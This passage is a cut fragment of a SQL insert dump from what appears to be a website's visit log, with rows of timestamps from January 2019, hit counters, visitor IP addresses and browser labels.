.69.204','chrome'),(371671,1547632869,2,2,0,0,'95.213.141.126','opera'),(371672,1547632955,1,1,0,0,'51.255.65.46','other'),(371673,1547633068,1,1,0,0,'31.43.12.240','chrome'),(371674,1547633528,1,1,0,0,'54.36.149.39','other'),(371675,1547633541,1,1,0,0,'54.36.149.60','other'),(371676,1547633693,1,1,0,0,'91.196.179.33','chrome'),(371677,1547633703,1,1,0,0,'46.133.158.247','chrome'),(371678,1547633816,1,1,0,0,'91.196.177.46','chrome'),(371679,1547634148,1,1,0,0,'91.196.177.46','other'),(371680,1547634222,1,1,0,0,'207.46.13.204','other'),(371681,1547634224,2,2,0,0,'66.249.69.144','chrome'),(371682,1547634265,9,9,0,0,'216.244.66.241','other'),(371683,1547634266,1,1,0,0,'66.249.79.76','chrome'),(371684,1547634400,1,1,0,0,'54.36.148.35','other'),(371685,1547634456,2,2,0,0,'66.249.69.150','chrome'),(371686,1547634481,2,2,0,0,'8.29.198.27','other'),(371687,1547634518,1,1,0,0,'95.132.38.90','firefox'),(371688,1547634677,2,2,0,0,'91.124.182.170','firefox'),(371689,1547634711,1,1,0,0,'91.196.178.70','chrome'),(371690,1547634783,1,1,0,0,'178.154.244.11','other'),(371691,1547634877,1,1,0,0,'54.36.149.61','other'),(371692,1547634969,1,1,0,0,'207.46.13.44','other'),(371693,1547635049,1,1,0,0,'54.36.148.147','other'),(371694,1547635065,4,4,0,0,'207.46.13.31','other'),(371695,1547635173,1,0,1,0,'66.249.69.217',''),(371697,1547635301,3,3,0,0,'216.244.66.241','other'),(371698,1547635426,2,2,0,0,'130.180.212.130','chrome'),(371699,1547635591,1,1,0,0,'91.196.178.77','firefox'),(371700,1547635733,1,1,0,0,'40.77.167.0','other'),(371701,1547635816,1,1,0,0,'178.95.244.109','chrome'),(371702,1547635950,1,1,0,0,'5.188.15.86','other'),(371703,1547636179,2,2,0,0,'40.77.167.41','other'),(371704,1547636222,1,1,0,0,'66.249.69.148','chrome'),(371705,1547636323,1,1,0,0,'54.36.148.199','other'),(371706,1547636451,1,1,0,0,'66.249.69.217','chrome'),(371708,1547636734,1,1,0,0,'54.36.149.76','other'),(371709,1547636868,1,1,0,0,'54.36.148.133','other'),(371710,1547636883,1,1,0,0,'66.102.9.40','chrome'),(371711,1547636884,1,1,0,0,'66.102.9.62','chrome'),(371712,1547636886,1,1,0,0,'107.178.194.22','chrome'),(371713,1547636938,1,1,0,0,'46.229.168.134','other'),(371714,1547637026,1,1,0,0,'54.36.148.169','other'),(371715,1547637135,8,8,0,0,'216.244.66.241','other'),(371716,1547637339,1,1,0,0,'54.36.148.147','other'),(371717,1547637551,2,2,0,0,'66.249.75.21','chrome'),(371718,1547637923,1,1,0,0,'66.249.75.22','chrome'),(371719,1547638050,8,8,0,0,'207.46.13.204','other'),(371720,1547638251,4,4,0,0,'216.244.66.241','other'),(371721,1547638385,1,1,0,0,'180.76.15.15','other'),(371722,1547638556,1,1,0,0,'54.36.148.56','other'),(371723,1547638748,1,1,0,0,'54.36.148.138','other'),(371724,1547638892,1,1,0,0,'54.36.149.49','other'),(371725,1547639221,7,7,0,0,'216.244.66.241','other'),(371726,1547639492,1,1,0,0,'54.36.149.24','other'),(371727,1547639566,1,1,0,0,'66.249.75.20','chrome'),(371728,1547639728,1,1,0,0,'54.36.148.215','other'),(371729,1547639838,1,1,0,0,'54.36.148.65','other'),(371730,1547640294,7,7,0,0,'216.244.66.241','other'),(371731,1547641237,1,1,0,0,'216.244.66.241','other'),(371732,1547641651,1,1,0,0,'37.9.113.148','other'),(371733,1547641896,2,2,0,0,'91.196.178.101','other'),(371734,1547642235,1,1,0,0,'54.36.149.36','other'),(371735,1547642473,1,1,0,0,'54.36.148.166','other'),(371736,1547642757,11,11,0,0,'216.244.66.241','other'),(371737,1547642782,1,1,0,0,'91.196.178.167','chrome'),(371738,1547642792,2,2,0,0,'91.196.178.85','firefox'),(371739,1547642825,1,1,0,0,'5.188.15.10','other'),(371740,1547643206,1,1,0,0,'54.36.148.27','other'),(371741,1547643439,1,1,0,0,'5.188.15.139','other'),(371742,1547643734,7,7,0,0,'216.244.66.241','other'),(371743,1547643800,1,1,0,0,'54.36.148.76','other'),(371744,1547643884,1,1,0,0,'91.196.178.34','chrome'),(371745,1547644736,1,1,0,0,'46.229.168.147','other'),(371746,1547644751,1,1,0,0,'46.229.168.132','other'),(371747,1547644943,2,2,0,0,'91.124.182.170','firefox'),(371748,1547645148,1,1,0,0,'66.249.69.200','chrome'),(371749,1547645212,1,1,0,0,'46.229.168.142','other'),(371750,1547645329,1,1,0,0,'8.29.198.27','other'),(371751,1547645361,1,1,0,0,'66.249.69.204','chrome'),(371752,1547645482,2,2,0,0,'5.45.207.79','other'),(371753,1547645494,1,1,0,0,'37.9.113.20','other'),(371754,1547645499,1,1,0,0,'5.45.207.8','other'),(371755,1547645582,2,2,0,0,'95.108.181.54','other'),(371756,1547645607,1,1,0,0,'54.36.149.3','other'),(371757,1547645616,6,6,0,0,'216.244.66.241','other'),(371758,1547645657,2,2,0,0,'37.9.113.103','other'),(371759,1547645777,3,3,0,0,'95.108.213.4','other'),(371760,1547645823,1,1,0,0,'141.8.142.103','other'),(371761,1547645885,1,1,0,0,'46.229.168.139','other'),(371762,1547646046,2,2,0,0,'178.154.244.11','other'),(371763,1547646092,3,3,0,0,'5.45.207.19','other'),(371764,1547646160,3,3,0,0,'178.154.171.24','other'),(371765,1547646204,1,1,0,0,'8.29.198.25','other'),(371766,1547646215,1,1,0,0,'178.154.244.65','other'),(371767,1547646476,2,2,0,0,'5.45.207.79','other'),(371768,1547646509,1,1,0,0,'87.250.224.65','other'),(371769,1547646662,5,5,0,0,'216.244.66.241','other'),(371770,1547646724,1,1,0,0,'91.196.179.138','chrome'),(371771,1547646734,1,1,0,0,'46.229.168.134','other'),(371772,1547646869,1,1,0,0,'141.8.142.103','other'),(371773,1547647103,1,1,0,0,'193.105.62.145','chrome'),(371774,1547647349,13,13,0,0,'51.75.13.149','other'),(371775,1547647737,1,1,0,0,'54.36.148.71','other'),(371776,1547647901,1,1,0,0,'54.36.148.102','other'),(371777,1547648272,4,4,0,0,'91.196.178.70','chrome'),(371778,1547648387,4,4,0,0,'216.244.66.241','other'),(371779,1547649294,4,4,0,0,'91.196.178.70','chrome'),(371780,1547649553,6,6,0,0,'216.244.66.241','other'),(371781,1547650133,2,2,0,0,'91.196.178.85','firefox'),(371782,1547650735,1,1,0,0,'66.249.75.17','chrome'),(371783,1547651074,1,1,0,0,'95.134.219.215','chrome'),(371784,1547651087,1,1,0,0,'54.36.148.21','other'),(371785,1547651123,2,2,0,0,'91.124.182.170','firefox'),(371786,1547651160,1,1,0,0,'5.188.15.60','other'),(371787,1547651289,9,9,0,0,'216.244.66.241','other'),(371788,1547651339,2,2,0,0,'91.196.178.70','chrome'),(371789,1547651349,2,2,0,0,'91.196.178.85','firefox'),(371790,1547651353,4,4,0,0,'91.196.178.80','chrome'),(371791,1547651534,2,2,0,0,'95.132.38.90','firefox'),(371792,1547651850,1,1,0,0,'66.249.69.202','chrome'),(371793,1547651989,1,1,0,0,'95.163.255.194','other'),(371794,1547651991,1,1,0,0,'95.163.255.153','other'),(371795,1547652212,1,1,0,0,'95.163.255.185','other'),(371796,1547652216,1,1,0,0,'95.163.255.191','other'),(371797,1547652271,1,1,0,0,'66.249.69.200','chrome'),(371798,1547652503,2,2,0,0,'216.244.66.241','other'),(371799,1547652644,1,1,0,0,'54.36.148.184','other'),(371800,1547652648,1,1,0,0,'46.229.168.136','other'),(371801,1547652666,1,1,0,0,'46.211.56.213','chrome'),(371802,1547653139,1,1,0,0,'87.76.255.95','firefox'),(371803,1547653150,1,1,0,0,'54.36.149.67','other'),(371804,1547653171,1,1,0,0,'66.249.75.22','chrome'),(371805,1547653419,1,1,0,0,'5.188.15.34','other'),(371806,1547653537,1,1,0,0,'54.36.148.34','other'),(371807,1547653793,1,1,0,0,'54.36.148.129','other'),(371808,1547653813,1,1,0,0,'54.36.149.54','other'),(371809,1547653888,1,1,0,0,'54.36.148.77','other'),(371810,1547654078,1,1,0,0,'54.36.149.106','other'),(371811,1547654120,1,1,0,0,'66.249.69.200','chrome'),(371812,1547654220,12,12,0,0,'216.244.66.241','other'),(371813,1547654393,1,1,0,0,'180.76.15.142','other'),(371814,1547654394,1,1,0,0,'180.76.15.17','other'),(371815,1547654616,1,1,0,0,'54.36.148.114','other'),(371816,1547654620,2,2,0,0,'95.135.17.95','firefox'),(371817,1547654782,1,1,0,0,'54.36.149.9','other'),(371818,1547655051,1,1,0,0,'54.36.149.92','other'),(371819,1547655181,2,2,0,0,'216.244.66.241','other'),(371820,1547655310,1,1,0,0,'95.108.213.4','other'),(371821,1547655342,1,1,0,0,'141.8.142.103','other'),(371822,1547655460,2,2,0,0,'178.154.244.65','other'),(371823,1547655480,1,1,0,0,'54.36.148.244','other'),(371824,1547655560,3,3,0,0,'5.45.207.19','other'),(371825,1547655681,1,1,0,0,'54.36.149.63','other'),(371826,1547655746,2,2,0,0,'95.108.181.54','other'),(371827,1547655775,1,1,0,0,'54.36.148.39','other'),(371828,1547655790,2,2,0,0,'5.45.207.8','other'),(371829,1547655815,1,1,0,0,'54.36.148.167','other'),(371830,1547655843,3,3,0,0,'37.9.113.148','other'),(371831,1547655892,1,1,0,0,'40.77.167.30','other'),(371832,1547655912,1,1,0,0,'37.9.113.103','other'),(371833,1547655934,1,1,0,0,'92.113.127.219','chrome'),(371834,1547656105,1,1,0,0,'87.250.224.47','other'),(371835,1547656120,1,1,0,0,'216.244.66.241','other'),(371836,1547656176,1,1,0,0,'8.29.198.26','other'),(371837,1547656281,1,1,0,0,'87.250.224.64','other'),(371838,1547656324,1,1,0,0,'46.229.168.150','other'),(371839,1547656341,1,1,0,0,'141.8.142.103','other'),(371840,1547656352,1,1,0,0,'54.36.148.129','other'),(371841,1547656407,1,1,0,0,'213.180.203.9','other'),(371842,1547656565,1,1,0,0,'87.250.224.65','other'),(371843,1547656641,2,2,0,0,'5.45.207.19','other'),(371844,1547656835,1,1,0,0,'178.154.200.48','other'),(371845,1547656918,1,1,0,0,'66.249.75.16','chrome'),(371846,1547656919,1,1,0,0,'66.249.75.22','chrome'),(371847,1547657026,12,12,0,0,'216.244.66.241','other'),(371848,1547657044,1,1,0,0,'8.29.198.25','other'),(371849,1547657125,1,1,0,0,'178.154.244.65','other'),(371850,1547657222,1,1,0,0,'54.36.148.228','other'),(371851,1547657490,1,1,0,0,'54.36.148.72','other'),(371852,1547657628,1,1,0,0,'66.249.69.200','chrome'),(371853,1547657763,1,1,0,0,'54.36.148.203','other'),(371854,1547657776,2,2,0,0,'5.45.207.79','other'),(371855,1547657933,2,2,0,0,'216.244.66.241','other'),(371856,1547658227,1,1,0,0,'5.45.207.19','other'),(371857,1547658469,1,1,0,0,'54.36.148.247','other'),(371858,1547658726,1,1,0,0,'54.36.148.156','other'),(371859,1547658992,1,1,0,0,'178.154.244.11','other'),(371860,1547659158,1,1,0,0,'54.36.149.12','other'),(371861,1547659164,1,1,0,0,'66.249.75.22','chrome'),(371862,1547659296,1,1,0,0,'54.36.148.176','other'),(371863,1547659339,1,1,0,0,'54.36.148.250','other'),(371864,1547659505,1,1,0,0,'54.36.148.196','other'),(371865,1547659628,1,1,0,0,'54.36.148.98','other'),(371866,1547659816,10,10,0,0,'216.244.66.241','other'),(371867,1547660088,1,1,0,0,'66.249.69.200','chrome'),(371868,1547660426,1,1,0,0,'54.36.149.3','other'),(371869,1547660505,2,2,0,0,'207.46.13.204','other'),(371870,1547660639,1,1,0,0,'54.36.148.227','other'),(371871,1547660908,1,1,0,0,'54.36.148.69','other'),(371872,1547661095,1,1,0,0,'54.36.148.117','other'),(371873,1547661112,1,1,0,0,'66.249.75.16','chrome'),(371874,1547661132,1,1,0,0,'95.163.255.114','other'),(371875,1547661143,1,1,0,0,'95.163.255.109','other'),(371876,1547661467,1,1,0,0,'66.249.69.202','chrome'),(371877,1547661588,1,1,0,0,'216.244.66.241','other'),(371878,1547661647,1,1,0,0,'54.36.148.202','other'),(371879,1547661851,2,2,0,0,'46.229.168.146','other'),(371880,1547661912,1,1,0,0,'54.36.149.17','other'),(371881,1547661929,1,1,0,0,'54.36.148.241','other'),(371882,1547662009,1,1,0,0,'54.36.148.154','other'),(371883,1547662046,1,1,0,0,'54.36.148.71','other'),(371884,1547662160,1,1,0,0,'66.249.75.21','chrome'),(371885,1547662353,1,1,0,0,'46.229.168.144','other'),(371886,1547662491,2,2,0,0,'91.196.178.179','chrome'),(371887,1547662595,7,7,0,0,'216.244.66.241','other'),(371888,1547663027,2,2,0,0,'66.249.69.217','chrome'),(371889,1547663028,1,1,0,0,'66.249.69.200','chrome'),(371890,1547663149,1,1,0,0,'54.36.149.23','other'),(371891,1547663151,1,1,0,0,'66.249.69.221','chrome'),(371892,1547663160,1,1,0,0,'46.229.168.150','other'),(371893,1547663176,1,1,0,0,'66.249.69.204','chrome'),(371894,1547663185,1,1,0,0,'207.46.13.204','other'),(371895,1547663590,9,9,0,0,'216.244.66.241','other'),(371896,1547664064,1,1,0,0,'54.36.148.110','other'),(371897,1547664133,1,1,0,0,'54.36.148.26','other'),(371898,1547664459,1,1,0,0,'54.36.148.19','other'),(371899,1547664474,2,2,0,0,'46.211.25.103','chrome'),(371900,1547664868,1,1,0,0,'66.249.69.219','chrome'),(371901,1547664869,1,1,0,0,'66.249.69.204','chrome'),(371902,1547665245,1,1,0,0,'91.196.178.129','chrome'),(371903,1547665380,8,8,0,0,'216.244.66.241','other'),(371904,1547665727,1,1,0,0,'66.249.75.17','chrome'),(371905,1547665729,1,1,0,0,'66.249.75.22','chrome'),(371906,1547665877,1,1,0,0,'54.36.148.41','other'),(371907,1547665990,2,2,0,0,'185.234.217.126','msie'),(371908,1547666681,2,2,0,0,'216.244.66.241','other'),(371909,1547667019,1,1,0,0,'46.211.49.105','chrome'),(371910,1547667036,1,1,0,0,'8.29.198.25','other'),(371911,1547667263,1,1,0,0,'66.249.69.221','chrome'),(371913,1547667283,1,1,0,0,'46.229.168.147','other'),(371914,1547667377,1,1,0,0,'37.9.113.148','other'),(371915,1547667875,1,1,0,0,'8.29.198.26','other'),(371916,1547667927,1,1,0,0,'54.36.149.84','other'),(371917,1547668170,8,8,0,0,'216.244.66.241','other'),(371918,1547668864,1,1,0,0,'5.45.207.79','other'),(371919,1547668980,2,2,0,0,'54.165.59.7','other'),(371920,1547669110,3,3,0,0,'216.244.66.241','other'),(371921,1547669320,1,1,0,0,'141.8.142.103','other'),(371922,1547669413,1,1,0,0,'54.36.149.18','other'),(371923,1547670179,1,1,0,0,'66.249.69.204','chrome'),(371924,1547670241,1,1,0,0,'46.229.168.133','other'),(371925,1547670610,1,1,0,0,'46.229.168.135','other'),(371926,1547670678,1,1,0,0,'66.249.75.20','chrome'),(371927,1547670811,1,1,0,0,'54.36.148.253','other'),(371928,1547670838,1,1,0,0,'95.163.255.118','other'),(371929,1547670850,1,1,0,0,'95.163.255.103','other'),(371930,1547670864,1,1,0,0,'95.163.255.109','other'),(371931,1547670876,1,1,0,0,'95.163.255.102','other'),(371932,1547670891,1,1,0,0,'54.36.148.137','other'),(371933,1547670892,1,1,0,0,'95.163.255.106','other'),(371934,1547670906,1,1,0,0,'95.163.255.115','other'),(371935,1547670916,13,13,0,0,'216.244.66.241','other'),(371936,1547670921,1,1,0,0,'95.163.255.117','other'),(371937,1547670934,1,1,0,0,'95.163.255.119','other'),(371938,1547671782,1,1,0,0,'46.229.168.140','other'),(371939,1547671932,4,4,0,0,'216.244.66.241','other'),(371940,1547671985,2,2,0,0,'54.165.59.7','other'),(371941,1547672616,1,1,0,0,'66.102.9.35','chrome'),(371942,1547672617,1,1,0,0,'95.132.8.108','chrome'),(371943,1547673681,12,12,0,0,'216.244.66.241','other'),(371944,1547673987,1,1,0,0,'54.36.149.100','other'),(371945,1547674076,1,1,0,0,'66.249.69.202','chrome'),(371946,1547674710,1,1,0,0,'54.165.59.7','other'),(371947,1547674726,2,2,0,0,'216.244.66.241','other'),(371948,1547674902,1,1,0,0,'207.46.13.204','other'),(371949,1547675689,1,1,0,0,'66.249.69.204','chrome'),(371950,1547676215,1,1,0,0,'46.229.168.135','other'),(371951,1547676419,17,17,0,0,'216.244.66.241','other'),(371952,1547676660,1,1,0,0,'46.229.168.150','other'),(371953,1547677112,1,1,0,0,'54.36.148.11','other'),(371954,1547677398,1,1,0,0,'54.36.148.86','other'),(371955,1547677742,1,1,0,0,'46.229.168.152','other'),(371956,1547677881,1,1,0,0,'8.29.198.26','other'),(371957,1547678129,2,2,0,0,'141.8.142.103','other'),(371958,1547678145,2,2,0,0,'52.53.201.78','chrome'),(371959,1547678370,1,1,0,0,'54.36.148.211','other'),(371960,1547678715,1,1,0,0,'8.29.198.27','other'),(371961,1547678847,1,1,0,0,'178.154.244.11','other'),(371962,1547678879,1,1,0,0,'5.45.207.19','other'),(371963,1547679013,1,1,0,0,'95.108.213.4','other'),(371964,1547679016,1,1,0,0,'87.250.224.47','other'),(371965,1547679029,1,1,0,0,'37.9.113.148','other'),(371966,1547679055,1,1,0,0,'5.45.207.8','other'),(371967,1547679068,1,1,0,0,'37.9.113.103','other'),(371968,1547679094,1,1,0,0,'46.229.168.135','other'),(371969,1547679193,10,10,0,0,'216.244.66.241','other'),(371970,1547679245,2,2,0,0,'95.108.181.54','other'),(371971,1547679418,1,1,0,0,'66.249.69.202','chrome'),(371972,1547679521,1,1,0,0,'213.180.203.9','other'),(371973,1547679884,1,1,0,0,'54.36.148.244','other'),(371974,1547679918,1,1,0,0,'87.250.224.107','other'),(371975,1547679926,1,1,0,0,'87.250.224.64','other'),(371976,1547680091,1,1,0,0,'46.229.168.130','other'),(371977,1547680117,4,4,0,0,'216.244.66.241','other'),(371978,1547680495,1,1,0,0,'54.36.149.16','other'),(371979,1547680570,1,1,0,0,'66.249.75.20','chrome'),(371980,1547680573,1,1,0,0,'54.36.149.39','other'),(371981,1547681171,4,4,0,0,'216.244.66.241','other'),(371982,1547681567,1,1,0,0,'54.36.148.23','other'),(371983,1547682094,1,1,0,0,'95.163.255.97','other'),(371984,1547682097,1,1,0,0,'95.163.255.96','other'),(371985,1547682130,7,7,0,0,'216.244.66.241','other'),(371986,1547682628,1,1,0,0,'54.36.148.27','other'),(371987,1547683036,1,1,0,0,'54.36.149.33','other'),(371988,1547683239,6,6,0,0,'46.101.80.192','chrome'),(371989,1547683462,1,1,0,0,'54.36.149.24','other'),(371990,1547683794,1,1,0,0,'66.249.75.21','chrome'),(371991,1547683826,2,2,0,0,'207.46.13.156','other'),(371992,1547683878,1,1,0,0,'54.36.149.28','other'),(371993,1547684148,1,1,0,0,'157.55.39.163','other'),(371994,1547684410,1,1,0,0,'54.36.148.223','other'),(371995,1547684613,3,3,0,0,'157.55.39.157','other'),(371996,1547684675,16,16,0,0,'216.244.66.241','other'),(371997,1547684925,1,1,0,0,'207.46.13.240','other'),(371998,1547684929,1,1,0,0,'207.46.13.227','other'),(371999,1547685617,2,2,0,0,'216.244.66.241','other'),(372000,1547686203,1,1,0,0,'54.36.148.166','other'),(372001,1547686224,2,2,0,0,'157.55.39.163','other'),(372002,1547686459,2,2,0,0,'40.77.167.186','other'),(372003,1547686463,1,1,0,0,'207.46.13.227','other'),(372004,1547686487,1,1,0,0,'54.36.148.43','other'),(372005,1547686523,1,1,0,0,'5.196.66.162','other'),(372006,1547686550,1,1,0,0,'46.229.168.130','other'),(372007,1547686650,4,4,0,0,'216.244.66.241','other'),(372008,1547686740,2,2,0,0,'157.55.39.224','other'),(372009,1547686949,1,1,0,0,'54.36.148.148','other'),(372010,1547687088,1,1,0,0,'66.249.75.21','chrome'),(372011,1547687387,1,1,0,0,'207.46.13.5','other'),(372012,1547687405,1,1,0,0,'54.36.148.211','other'),(372013,1547687713,1,1,0,0,'216.244.66.241','other'),(372014,1547687735,1,1,0,0,'207.46.13.53','other'),(372015,1547687948,6,6,0,0,'178.154.244.11','other'),(372016,1547687962,4,4,0,0,'5.45.207.79','other'),(372017,1547688093,1,1,0,0,'5.45.207.19','other'),(372018,1547688157,1,1,0,0,'54.36.148.179','other'),(372019,1547688203,1,1,0,0,'180.76.15.17','other'),(372020,1547688208,1,1,0,0,'157.55.39.157','other'),(372021,1547688216,1,1,0,0,'213.180.203.9','other'),(372022,1547688300,1,1,0,0,'54.36.148.11','other'),(372023,1547688721,1,1,0,0,'8.29.198.26','other'),(372024,1547688834,1,1,0,0,'87.250.224.65','other'),(372025,1547688914,1,1,0,0,'54.36.148.184','other'),(372026,1547689127,1,1,0,0,'66.249.75.20','chrome'),(372027,1547689142,1,1,0,0,'141.8.142.103','other'),(372028,1547689202,2,2,0,0,'178.154.244.11','other'),(372029,1547689338,2,2,0,0,'5.45.207.79','other'),(372030,1547689615,1,1,0,0,'66.249.69.200','chrome'),(372031,1547689750,1,1,0,0,'54.36.148.146','other'),(372032,1547689857,1,1,0,0,'8.29.198.26','other'),(372033,1547689873,1,1,0,0,'54.36.148.16','other'),(372034,1547690155,1,1,0,0,'54.36.148.246','other'),(372035,1547690202,1,1,0,0,'180.76.15.22','other'),(372036,1547690203,1,1,0,0,'180.76.15.29','other'),(372037,1547690218,13,13,0,0,'216.244.66.241','other'),(372039,1547690298,2,2,0,0,'207.46.13.120','other'),(372040,1547690391,1,1,0,0,'66.249.75.17','chrome'),(372041,1547690395,1,1,0,0,'66.249.75.20','chrome'),(372042,1547690625,1,1,0,0,'5.45.207.19','other'),(372043,1547691142,1,1,0,0,'54.36.149.102','other'),(372044,1547691423,1,1,0,0,'54.36.148.93','other'),(372045,1547691445,1,1,0,0,'5.188.15.16','other'),(372046,1547692507,1,1,0,0,'207.46.13.46','other'),(372047,1547692629,1,1,0,0,'95.163.255.95','other'),(372048,1547692631,1,1,0,0,'95.163.255.96','other'),(372049,1547692708,2,2,0,0,'95.163.255.153','other'),(372050,1547692731,1,1,0,0,'54.36.149.16','other'),(372051,1547692891,1,1,0,0,'54.36.148.228','other'),(372052,1547692918,1,1,0,0,'207.46.13.120','other'),(372053,1547692989,12,12,0,0,'216.244.66.241','other'),(372054,1547692997,2,2,0,0,'157.55.39.157','other'),(372055,1547693039,1,1,0,0,'95.163.255.180','other'),(372056,1547693232,1,1,0,0,'54.36.149.6','other'),(372057,1547693299,1,1,0,0,'66.249.75.22','chrome'),(372058,1547693311,1,1,0,0,'54.36.149.69','other'),(372059,1547693498,1,1,0,0,'95.163.255.92','other'),(372060,1547693524,1,1,0,0,'54.36.149.72','other'),(372061,1547693694,1,1,0,0,'46.229.168.129','other'),(372062,1547694692,1,1,0,0,'216.244.66.241','other'),(372063,1547694788,1,1,0,0,'95.163.255.157','other'),(372064,1547694791,1,1,0,0,'95.163.255.192','other'),(372065,1547694866,1,1,0,0,'46.229.168.148','other'),(372066,1547694876,1,1,0,0,'95.163.255.151','other'),(372067,1547694915,1,1,0,0,'66.249.69.217','chrome'),(372068,1547694916,2,2,0,0,'66.249.69.200','chrome'),(372069,1547694965,2,2,0,0,'207.46.13.86','other'),(372070,1547695146,1,1,0,0,'95.163.255.189','other'),(372071,1547695174,1,1,0,0,'54.36.148.224','other'),(372072,1547695219,1,1,0,0,'95.163.255.179','other'),(372073,1547695508,1,1,0,0,'66.249.75.17','chrome'),(372074,1547695519,1,1,0,0,'66.249.75.20','chrome'),(372075,1547695547,2,2,0,0,'185.234.217.153','msie'),(372076,1547695577,2,2,0,0,'66.249.75.16','chrome'),(372077,1547695616,1,1,0,0,'46.229.168.146','other'),(372078,1547695747,13,13,0,0,'216.244.66.241','other'),(372079,1547695921,1,1,0,0,'207.46.13.120','other'),(372080,1547695950,2,2,0,0,'66.249.75.22','chrome'),(372081,1547696037,1,1,0,0,'54.36.149.25','other'),(372082,1547696254,1,1,0,0,'66.249.75.21','chrome'),(372083,1547696719,1,1,0,0,'66.249.75.16','chrome'),(372084,1547696801,1,1,0,0,'157.55.39.224','other'),(372085,1547697169,1,1,0,0,'216.244.66.241','other'),(372086,1547697371,1,1,0,0,'54.36.148.37','other'),(372087,1547697510,1,1,0,0,'46.229.168.153','other'),(372088,1547697694,1,1,0,0,'46.229.168.148','other'),(372089,1547697780,1,1,0,0,'95.163.255.93','other'),(372090,1547697802,1,1,0,0,'66.249.69.202','chrome'),(372091,1547698038,1,1,0,0,'40.77.167.178','other'),(372092,1547698488,10,10,0,0,'216.244.66.241','other'),(372093,1547698570,2,2,0,0,'52.38.9.213','chrome'),(372094,1547698716,1,1,0,0,'37.9.113.103','other'),(372095,1547698755,1,1,0,0,'95.108.213.4','other'),(372096,1547698903,1,1,0,0,'54.36.148.92','other'),(372097,1547699278,1,1,0,0,'95.163.255.97','other'),(372098,1547699299,1,1,0,0,'95.163.255.94','other'),(372099,1547699386,1,1,0,0,'66.249.75.16','chrome'),(372100,1547699391,1,1,0,0,'66.249.75.21','chrome'),(372101,1547699393,1,1,0,0,'54.36.148.35','other'),(372102,1547699553,1,1,0,0,'8.29.198.25','other'),(372103,1547699569,1,1,0,0,'54.36.148.116','other'),(372104,1547699635,1,1,0,0,'54.36.149.0','other'),(372105,1547699821,1,1,0,0,'216.244.66.241','other'),(372106,1547700244,1,1,0,0,'54.36.148.93','other'),(372107,1547700373,1,1,0,0,'95.163.255.156','other'),(372108,1547700384,1,1,0,0,'157.55.39.224','other'),(372109,1547700483,1,1,0,0,'66.249.75.17','chrome'),(372110,1547700487,1,1,0,0,'66.249.75.22','chrome'),(372111,1547700755,1,1,0,0,'8.29.198.27','other'),(372112,1547700775,1,1,0,0,'66.249.69.204','chrome'),(372113,1547700834,1,1,0,0,'95.163.255.96','other'),(372114,1547700891,1,1,0,0,'46.229.168.135','other'),(372115,1547701293,5,5,0,0,'216.244.66.241','other'),(372116,1547701465,1,1,0,0,'66.249.75.22','chrome'),(372117,1547701603,1,1,0,0,'46.229.168.138','other'),(372118,1547701705,1,1,0,0,'54.36.149.28','other'),(372119,1547701729,1,1,0,0,'66.249.69.217','chrome'),(372120,1547701732,1,1,0,0,'66.249.69.200','chrome'),(372121,1547701987,1,1,0,0,'54.36.149.6','other'),(372122,1547702321,1,1,0,0,'54.36.148.144','other'),(372123,1547702451,1,1,0,0,'46.229.168.144','other'),(372124,1547703051,1,1,0,0,'54.36.148.239','other'),(372125,1547703112,1,1,0,0,'95.163.255.162','other'),(372126,1547703327,4,4,0,0,'216.244.66.241','other'),(372127,1547703531,1,1,0,0,'95.163.255.96','other'),(372128,1547703747,1,1,0,0,'54.36.148.60','other'),(372129,1547703881,1,1,0,0,'66.249.69.204','chrome'),(372130,1547703941,87,87,0,0,'5.9.108.254','other'),(372131,1547704117,2,2,0,0,'178.171.21.87','chrome'),(372132,1547704118,22,22,0,0,'144.76.81.229','other'),(372133,1547704341,1,1,0,0,'54.36.149.80','other'),(372134,1547704799,1,1,0,0,'216.244.66.241','other'),(372135,1547704989,2,2,0,0,'31.220.0.225','other'),(372136,1547705042,1,1,0,0,'54.36.148.92','other'),(372137,1547705263,1,1,0,0,'66.249.75.17','chrome'),(372138,1547705265,1,1,0,0,'66.249.75.20','chrome'),(372139,1547705747,1,1,0,0,'95.163.255.163','other'),(372140,1547705760,1,1,0,0,'95.163.255.172','other'),(372141,1547705960,3,3,0,0,'91.196.178.84','firefox'),(372142,1547706070,273,273,0,0,'5.9.108.254','other'),(372143,1547706291,1,1,0,0,'188.191.239.161','chrome'),(372144,1547706764,20,20,0,0,'216.244.66.241','other'),(372145,1547706766,1,1,0,0,'40.77.167.28','other'),(372146,1547706977,1,1,0,0,'66.249.69.200','chrome'),(372147,1547707246,1,1,0,0,'207.46.13.91','other'),(372148,1547707507,1,1,0,0,'54.36.149.55','other'),(372149,1547707620,2,2,0,0,'91.196.178.70','chrome'),(372150,1547707700,2,2,0,0,'91.196.178.84','firefox'),(372151,1547708035,1,1,0,0,'40.77.167.28','other'),(372152,1547708341,1,1,0,0,'66.249.69.217','chrome'),(372153,1547708366,1,1,0,0,'66.249.69.200','chrome'),(372154,1547708571,1,1,0,0,'216.244.66.241','other'),(372155,1547708641,1,1,0,0,'66.249.69.204','chrome'),(372156,1547709024,1,1,0,0,'66.249.69.145','chrome'),(372158,1547709058,2,2,0,0,'66.249.69.143','chrome'),(372159,1547709059,1,1,0,0,'66.249.69.149','chrome'),(372160,1547709095,1,1,0,0,'95.163.255.180','other'),(372161,1547709355,2,2,0,0,'91.124.182.170','firefox'),(372162,1547709427,1,1,0,0,'95.163.255.154','other'),(372163,1547709429,1,1,0,0,'95.163.255.151','other'),(372164,1547709465,1,1,0,0,'66.249.69.150','chrome'),(372165,1547709526,9,9,0,0,'216.244.66.241','other'),(372166,1547709795,1,1,0,0,'95.163.255.155','other'),(372167,1547709826,1,1,0,0,'51.255.65.46','other'),(372168,1547710229,1,1,0,0,'66.249.69.200','chrome'),(372169,1547710238,1,1,0,0,'54.36.148.148','other'),(372170,1547710389,1,1,0,0,'8.29.198.27','other'),(372171,1547710488,3,3,0,0,'216.244.66.241','other'),(372172,1547710669,1,1,0,0,'54.36.149.45','other'),(372173,1547710980,4,4,0,0,'141.8.142.103','other'),(372174,1547711224,1,1,0,0,'54.36.148.248','other'),(372175,1547711314,1,1,0,0,'37.9.113.148','other'),(372176,1547711325,1,1,0,0,'46.229.168.133','other'),(372177,1547711408,1,1,0,0,'95.163.255.180','other'),(372178,1547711419,1,1,0,0,'95.163.255.150','other'),(372179,1547711432,3,3,0,0,'87.250.224.47','other'),(372180,1547711556,1,1,0,0,'37.9.113.103','other'),(372181,1547711567,1,1,0,0,'40.77.167.12','other'),(372182,1547711584,2,2,0,0,'5.45.207.19','other'),(372183,1547711610,1,1,0,0,'8.29.198.26','other'),(372184,1547711617,3,3,0